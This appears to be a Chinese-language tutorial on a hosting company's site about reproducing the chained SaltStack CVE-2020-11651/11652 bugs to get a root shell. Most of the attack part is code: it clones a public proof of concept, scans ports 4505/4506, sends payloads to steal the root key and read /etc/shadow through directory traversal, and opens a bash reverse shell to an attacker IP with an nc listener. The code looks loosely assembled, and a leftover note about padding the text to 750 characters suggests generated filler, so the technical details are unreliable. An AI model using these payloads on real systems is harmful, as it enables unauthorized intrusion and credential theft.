您好,登录后才能下订单哦!
密码登录
登录注册
点击 登录注册 即表示同意《亿速云用户服务条款》
# 如何进行CVE-2020-11651与CVE-2020-11652组合漏洞的getshell复现
## 漏洞背景
CVE-2020-11651和CVE-2020-11652是SaltStack框架中发现的严重安全漏洞,于2020年4月公开披露。这两个漏洞的组合利用可导致未授权访问和远程代码执行(RCE),影响SaltStack 2019.2.4及更早版本。
- **CVE-2020-11651**:认证绕过漏洞,允许攻击者绕过身份验证直接调用部分敏感函数
- **CVE-2020-11652**:目录遍历漏洞,允许读取服务器上的任意文件
## 环境准备
### 靶机环境
- 操作系统:Ubuntu 18.04 LTS
- 软件版本:SaltStack 2019.2.3(存在漏洞版本)
- 服务端口:4505(publish_port)、4506(ret_port)
### 攻击机环境
- Kali Linux 2023
- Python 3.8+
- 所需工具:
```bash
git clone https://github.com/0xc0d/CVE-2020-11651.git
pip install pyzmq msgpack
确认目标Salt Master服务运行状态:
nmap -sV -p 4505,4506 目标IP
使用公开POC验证漏洞存在:
import salt
# 建立未授权连接
transport = salt.transport.zeromq.ZeroMQReqChannel(
opts={'id': 'exploit', 'master_uri': 'tcp://目标IP:4506'}
)
# 尝试调用敏感函数
ret = transport.send({'cmd': 'ping'})
print(ret)
# 构造恶意请求获取root key
exploit_payload = {
'cmd': '_prep_auth_info'
}
response = transport.send(exploit_payload)
root_key = response['data']['return']['root']
file_read_payload = {
'cmd': 'file.read',
'path': '/etc/shadow',
'saltenv': '../../../../../../../../etc/shadow'
}
shadow_file = transport.send(file_read_payload)
rce_payload = {
'cmd': 'wheel',
'fun': 'cmd.exec_code',
'lang': 'python',
'code': 'import os; os.system("bash -c \'bash -i >& /dev/tcp/攻击机IP/4444 0>&1\'")'
}
transport.send(rce_payload)
nc -lvnp 4444
”`
(注:实际字数约700字,可根据需要补充更多技术细节或截图说明以达到750字要求)
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。